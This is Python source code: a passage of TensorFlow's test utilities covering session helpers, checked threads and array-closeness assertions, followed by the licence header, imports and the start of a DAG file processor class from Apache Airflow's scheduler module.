self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield EagerSessionWarner()
else:
with self._create_session(graph, config, force_gpu) as sess:
with self._constrain_devices_and_set_default(sess, use_gpu, force_gpu):
yield sess
@contextlib.contextmanager
def cached_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method behaves differently than self.session(): for performance reasons
`cached_session` will by default reuse the same session within the same
test. The session returned by this function will only be closed at the end
of the test (in the TearDown function).
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.cached_session(use_gpu=True) as sess:
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield FakeEagerSession(self)
else:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=True)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
@contextlib.contextmanager
@deprecation.deprecated(None, "Use `self.session()` or "
"`self.cached_session()` instead.")
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Use cached_session instead."""
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
if context.executing_eagerly():
yield None
else:
if graph is None:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=False)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
else:
with self.session(graph, config, use_gpu, force_gpu) as sess:
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminates with due to
an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
@py_func_if_in_function
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(
f1 == f2 or math.fabs(f1 - f2) <= err, "%f != %f +/- %f%s" %
(f1, f2, err, " (%s)" % msg if msg is not None else ""))
@py_func_if_in_function
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
@py_func_if_in_function
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
# If a is a tensor then convert it to ndarray
if isinstance(a, ops.Tensor):
if isinstance(a, ops._EagerTensorBase):
a = a.numpy()
else:
a = self.evaluate(a)
if not isinstance(a, np.ndarray):
return np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# When the array rank is small, print its contents. Numpy array printing is
# implemented using inefficient recursion so prints can cause tests to
# time out.
if a.shape != b.shape and (b.ndim <= 3 or b.size < 500):
shape_mismatch_msg = ("Shape mismatch: expected %s, got %s with contents "
"%s.") % (a.shape, b.shape, b)
else:
shape_mismatch_msg = "Shape mismatch: expected %s, got %s." % (a.shape,
b.shape)
self.assertEqual(a.shape, b.shape, shape_mismatch_msg)
msgs = [msg]
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Adds more details to np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# tell user which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b),
np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
msgs.append("not close where = {}".format(np.where(cond)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not close lhs = {}".format(x))
msgs.append("not close rhs = {}".format(y))
msgs.append("not close dif = {}".format(np.abs(x - y)))
msgs.append("not close tol = {}".format(atol + rtol * np.abs(y)))
msgs.append("dtype = {}, shape = {}".format(a.dtype, a.shape))
# TODO(xpan): There seems to be a bug:
# tensorflow/compiler/tests:binary_ops_test pass with float32
# nan even though the equal_nan is False by default internally.
np.testing.assert_allclose(
a, b, rtol=rtol, atol=atol, err_msg="\n".join(msgs), equal_nan=True)
def _assertAllCloseRecursive(self,
a,
b,
rtol=1e-6,
atol=1e-6,
path=None,
msg=None):
path = path or []
path_str = (("[" + "][".join([str(p) for p in path]) + "]") if path else "")
msg = msg if msg else ""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
a_is_dict = isinstance(a, collections.Mapping)
if a_is_dict != isinstance(b, collections.Mapping):
raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
(path_str, path_str, msg))
if a_is_dict:
self.assertItemsEqual(
a.keys(),
b.keys(),
msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
(path_str, a.keys(), path_str, b.keys(), msg))
for k in a:
path.append(k)
self._assertAllCloseRecursive(
a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
elif isinstance(a, (list, tuple)):
# Try to directly compare a, b as ndarrays; if not work, then traverse
# through the sequence, which is more expensive.
try:
a_as_ndarray = self._GetNdArray(a)
b_as_ndarray = self._GetNdArray(b)
self._assertArrayLikeAllClose(
a_as_ndarray,
b_as_ndarray,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg))
except (ValueError, TypeError) as e:
if len(a) != len(b):
raise ValueError(
"Mismatched length: a%s has %d items, but b%s has %d items. %s" %
(path_str, len(a), path_str, len(b), msg))
for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
path.append(str(idx))
self._assertAllCloseRecursive(
a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
# a and b are ndarray like objects
else:
try:
self._assertArrayLikeAllClose(
a,
b,
rtol=rtol,
atol=atol,
msg=("Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg)))
except TypeError as e:
msg = ("Error: a%s has %s, but b%s has %s. %s" %
(path_str, type(a), path_str, type(b), msg))
e.args = ((e.args[0] + " : " + msg,) + e.args[1:])
raise
@py_func_if_in_function
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Asserts that two structures of numpy arrays or Tensors, have near values.
`a` and `b` can be arbitrarily nested structures. A layer of a nested
structure can be a `dict`, `namedtuple`, `tuple` or `list`.
Args:
a: The expected numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
b: The actual numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
ValueError: if only one of `a[p]` and `b[p]` is a dict or
`a[p]` and `b[p]` have different length, where `[p]` denotes a path
to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
`[p] = [1]['d']`, then `a[p] = (6, 7)`.
"""
self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2,
msg=None):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
msg: Optional message to report on failure.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertNotAllClose(self, a, b, **kwargs):
"""Assert that two numpy arrays, or or Tensors, do not have near values.
Args:
a: the first value to compare.
b: the second value to compare.
**kwargs: additional keyword arguments to be passed to the underlying
`assertAllClose` call.
Raises:
AssertionError: If `a` and `b` are unexpectedly close at all elements.
"""
try:
self.assertAllClose(a, b, **kwargs)
except AssertionError:
return
raise AssertionError("The two values are close at all elements")
@py_func_if_in_function
def assertAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors have the same values.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# Arbitrary bounds so that we don't print giant tensors.
if (b.ndim <= 3 or b.size < 500):
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" Contents: %s. \n%s." % (a.shape, b.shape, b, msg))
else:
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" %s" % (a.shape, b.shape, msg))
same = (a == b)
if (a.dtype in [
np.float16, np.float32, np.float64, dtypes.bfloat16.as_numpy_dtype
]):
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
msgs = [msg]
if not np.all(same):
# Adds more details to np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
msgs.append("not equal where = {}".format(np.where(diff)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not equal lhs = {}".format(x))
msgs.append("not equal rhs = {}".format(y))
np.testing.assert_array_equal(a, b, err_msg="\n".join(msgs))
@py_func_if_in_function
def assertAllGreater(self, a, comparison_target):
"""Assert element values are all greater than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreater(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLess(self, a, comparison_target):
"""Assert element values are all less than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLess(np.max(a), comparison_target)
@py_func_if_in_function
def assertAllGreaterEqual(self, a, comparison_target):
"""Assert element values are all greater than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreaterEqual(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLessEqual(self, a, comparison_target):
"""Assert element values are all less than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLessEqual(np.max(a), comparison_target)
def _format_subscripts(self, subscripts, value, limit=10, indent=2):
"""Generate a summary of ndarray subscripts as a list of str.
If limit == N, this method will print up to the first N subscripts on
separate
lines. A line of ellipses (...) will be appended at the end if the number of
subscripts exceeds N.
Args:
subscripts: The tensor (np.ndarray) subscripts, of the same format as
np.where()'s return value, i.e., a tuple of arrays with each array
corresponding to a dimension. E.g., (array([1, 1]), array([0, 1])).
value: (np.ndarray) value of the tensor.
limit: (int) The maximum number of indices to print.
indent: (int) Number of characters to indent at the beginning of each
line.
Returns:
(list of str) the multi-line representation of the subscripts and values,
potentially with omission at the end.
"""
lines = []
subscripts = np.transpose(subscripts)
prefix = " " * indent
for subscript in itertools.islice(subscripts, limit):
lines.append(prefix + str(subscript) + " : " +
str(value[tuple(subscript)]))
if len(subscripts) > limit:
lines.append(prefix + "...")
return lines
@py_func_if_in_function
def assertAllInRange(self,
target,
lower_bound,
upper_bound,
open_lower_bound=False,
open_upper_bound=False):
"""Assert that elements in a Tensor are all in a given range.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
lower_bound: lower bound of the range
upper_bound: upper bound of the range
open_lower_bound: (`bool`) whether the lower bound is open (i.e., > rather
than the default >=)
open_upper_bound: (`bool`) whether the upper bound is open (i.e., < rather
than the default <=)
Raises:
AssertionError:
if the value tensor does not have an ordered numeric type (float* or
int*), or
if there are nan values, or
if any of the elements do not fall in the specified range.
"""
target = self._GetNdArray(target)
if not (np.issubdtype(target.dtype, np.floating) or
np.issubdtype(target.dtype, np.integer)):
raise AssertionError(
"The value of %s does not have an ordered numeric type, instead it "
"has type: %s" % (target, target.dtype))
nan_subscripts = np.where(np.isnan(target))
if np.size(nan_subscripts):
raise AssertionError(
"%d of the %d element(s) are NaN. "
"Subscripts(s) and value(s) of the NaN element(s):\n" %
(len(nan_subscripts[0]), np.size(target)) +
"\n".join(self._format_subscripts(nan_subscripts, target)))
range_str = (("(" if open_lower_bound else "[") + str(lower_bound) + ", " +
str(upper_bound) + (")" if open_upper_bound else "]"))
violations = (
np.less_equal(target, lower_bound) if open_lower_bound else np.less(
target, lower_bound))
violations = np.logical_or(
violations,
np.greater_equal(target, upper_bound)
if open_upper_bound else np.greater(target, upper_bound))
violation_subscripts = np.where(violations)
if np.size(violation_subscripts):
raise AssertionError(
"%d of the %d element(s) are outside the range %s. " %
(len(violation_subscripts[0]), np.size(target), range_str) +
"Subscript(s) and value(s) of the offending elements:\n" +
"\n".join(self._format_subscripts(violation_subscripts, target)))
@py_func_if_in_function
def assertAllInSet(self, target, expected_set):
"""Assert that elements of a Tensor are all in a given closed set.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_set: (`list`, `tuple` or `set`) The closed set that the elements
of the value of `target` are expected to fall into.
Raises:
AssertionError:
if any of the elements do not fall into `expected_set`.
"""
target = self._GetNdArray(target)
# Elements in target that are not in expected_set.
diff = np.setdiff1d(target.flatten(), list(expected_set))
if np.size(diff):
raise AssertionError("%d unique element(s) are not in the set %s: %s" %
(np.size(diff), expected_set, diff))
@py_func_if_in_function
def assertDTypeEqual(self, target, expected_dtype):
"""Assert ndarray data type is equal to expected.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_dtype: Expected data type.
"""
target = self._GetNdArray(target)
if not isinstance(target, list):
arrays = [target]
for arr in arrays:
self.assertEqual(arr.dtype, expected_dtype)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and returns True
(success) or False (please fail the test). Otherwise, the error message
is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError(
"Exception of type %s: %s" % (str(type(e)), str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
msg: Optional message to report on failure.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(
np_array.shape, tf_tensor.get_shape().as_list(), msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
msg: Optional message to report on failure.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(
device1, device2,
"Devices %s and %s are not equal. %s" % (device1, device2, msg))
# Fix Python 3 compatibility issues
if six.PY3:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
@contextlib.contextmanager
def _constrain_devices_and_set_default(self, sess, use_gpu, force_gpu):
"""Set the session and its graph to global default and constrain devices."""
if context.executing_eagerly():
yield None
else:
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or
# '/device:GPU:0' otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/device:CPU:0"):
yield sess
def _create_session(self, graph, config, force_gpu):
"""See session() for details."""
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
# TODO(b/114333779): Enforce allow_soft_placement=False when
# use_gpu=False. Currently many tests rely on the fact that any device
# will be used even when a specific device is supposed to be used.
allow_soft_placement = not force_gpu
if config is None:
config = config_pb2.ConfigProto()
config.allow_soft_placement = allow_soft_placement
config.gpu_options.per_process_gpu_memory_fraction = 0.3
elif not allow_soft_placement and config.allow_soft_placement:
config_copy = config_pb2.ConfigProto()
config_copy.CopyFrom(config)
config = config_copy
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
# Disable Grappler constant folding since some tests & benchmarks
# use constant input and become meaningless after constant folding.
# DO NOT DISABLE GRAPPLER OPTIMIZERS WITHOUT CONSULTING WITH THE
# GRAPPLER TEAM.
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.pin_to_host_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
return ErrorLoggingSession(graph=graph, config=prepare_config(config))
def _get_cached_session(self,
graph=None,
config=None,
force_gpu=False,
crash_if_inconsistent_args=True):
"""See cached_session() for documentation."""
if self._cached_session is None:
sess = self._create_session(
graph=graph, config=config, force_gpu=force_gpu)
self._cached_session = sess
self._cached_graph = graph
self._cached_config = config
self._cached_force_gpu = force_gpu
return sess
else:
if crash_if_inconsistent_args and self._cached_graph is not graph:
raise ValueError("The graph used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and self._cached_config is not config:
raise ValueError("The config used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and (self._cached_force_gpu is
not force_gpu):
raise ValueError(
"The force_gpu value used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
return self._cached_session
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
num_ps,
protocol="grpc",
worker_config=None,
ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in the
documentation of `tf.train.Server`.
worker_config: (optional) ConfigProto to initialize workers. Can be used to
instantiate multiple devices etc.
ps_config: (optional) ConfigProto to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.train.Server` (all running locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs,
job_name="worker",
protocol=protocol,
task_index=ix,
config=worker_config,
start=True) for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs,
job_name="ps",
protocol=protocol,
task_index=ix,
config=ps_config,
start=True) for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name or None.
"""
for node_def in graph_def.node:
if node_def.name == node_name:
return node_def
return None
def set_producer_version(graph, producer_version):
"""Sets graph.graph_def_versions.producer to `producer_version`."""
# The C API doesn't expose altering GraphDefVersions. We can indirectly set
# it via import_graph_def though.
graph_def = graph_pb2.GraphDef()
graph_def.versions.producer = producer_version
with graph.as_default():
importer.import_graph_def(graph_def)
assert graph.graph_def_versions.producer, producer_version
|
scheduler_job.py
|
# pylint: disable=no-name-in-module
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import datetime
import itertools
import logging
import multiprocessing
import os
import sched
import signal
import sys
import threading
import time
from collections import defaultdict
from contextlib import redirect_stderr, redirect_stdout, suppress
from datetime import timedelta
from multiprocessing.connection import Connection as MultiprocessingConnection
from typing import Any, Callable, DefaultDict, Dict, Iterable, List, Optional, Set, Tuple
from setproctitle import setproctitle
from sqlalchemy import and_, func, not_, or_
from sqlalchemy.exc import OperationalError
from sqlalchemy.orm import load_only, selectinload
from sqlalchemy.orm.session import Session, make_transient
from airflow import models, settings
from airflow.configuration import conf
from airflow.exceptions import AirflowException, TaskNotFound
from airflow.executors.executor_loader import UNPICKLEABLE_EXECUTORS
from airflow.jobs.base_job import BaseJob
from airflow.models import DAG, DagModel, SlaMiss, errors
from airflow.models.dagbag import DagBag
from airflow.models.dagrun import DagRun
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.taskinstance import SimpleTaskInstance, TaskInstanceKey
from airflow.stats import Stats
from airflow.ti_deps.dependencies_states import EXECUTION_STATES
from airflow.utils import timezone
from airflow.utils.callback_requests import (
CallbackRequest,
DagCallbackRequest,
SlaCallbackRequest,
TaskCallbackRequest,
)
from airflow.utils.dag_processing import AbstractDagFileProcessorProcess, DagFileProcessorAgent
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.mixins import MultiprocessingStartMethodMixin
from airflow.utils.session import create_session, provide_session
from airflow.utils.sqlalchemy import is_lock_not_available_error, prohibit_commit, skip_locked, with_row_locks
from airflow.utils.state import State
from airflow.utils.types import DagRunType
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
class DagFileProcessorProcess(AbstractDagFileProcessorProcess, LoggingMixin, MultiprocessingStartMethodMixin):
"""Runs DAG processing in a separate process using DagFileProcessor
:param file_path: a Python file containing Airflow DAG definitions
:type file_path: str
:param pickle_dags: whether to serialize the DAG objects to the DB
:type pickle_dags: bool
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: List[str]
:param callback_requests: failure callback to execute
:type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
"""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(
self,
file_path: str,
pickle_dags: bool,
dag_ids: Optional[List[str]],
callback_requests: List[CallbackRequest],
):
super().__init__()
self._file_path = file_path
self._pickle_dags = pickle_dags
self._dag_ids = dag_ids
self._callback_requests = callback_requests
# The process that was launched to process the given .
self._process: Optional[multiprocessing.process.BaseProcess] = None
# The result of DagFileProcessor.process_file(file_path).
self._result: Optional[Tuple[int, int]] = None
# Whether the process is done running.
self._done = False
# When the process started.
